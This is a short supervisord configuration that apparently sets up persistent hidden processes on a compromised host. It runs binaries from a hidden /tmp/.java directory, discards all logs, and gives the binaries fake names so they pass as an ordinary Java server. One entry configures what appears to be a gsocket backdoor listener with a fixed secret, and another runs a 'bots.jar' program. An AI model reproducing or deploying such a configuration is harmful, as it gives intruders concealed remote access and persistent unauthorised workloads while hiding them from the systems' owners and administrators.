[supervisord]
logfile=/dev/null

[program:app]
directory=/tmp/.java/bin
command=./patch.jar -a 'java -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./bots.jar -c ./conf.json
stdout_logfile=/dev/null
autorestart = true

[program:gnet]
directory=/tmp/.java/bin
environment=GSOCKET_ARGS="-s iE928cAeD2a1E2c-5A16f98-13D9g8Hbj7-56C4a961eCd9-F9440d6A2803-8A1c5J1g60 -liq"
command=./patch.jar -a 'java -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./add-on.jar 
stdout_logfile=/dev/null
autorestart = true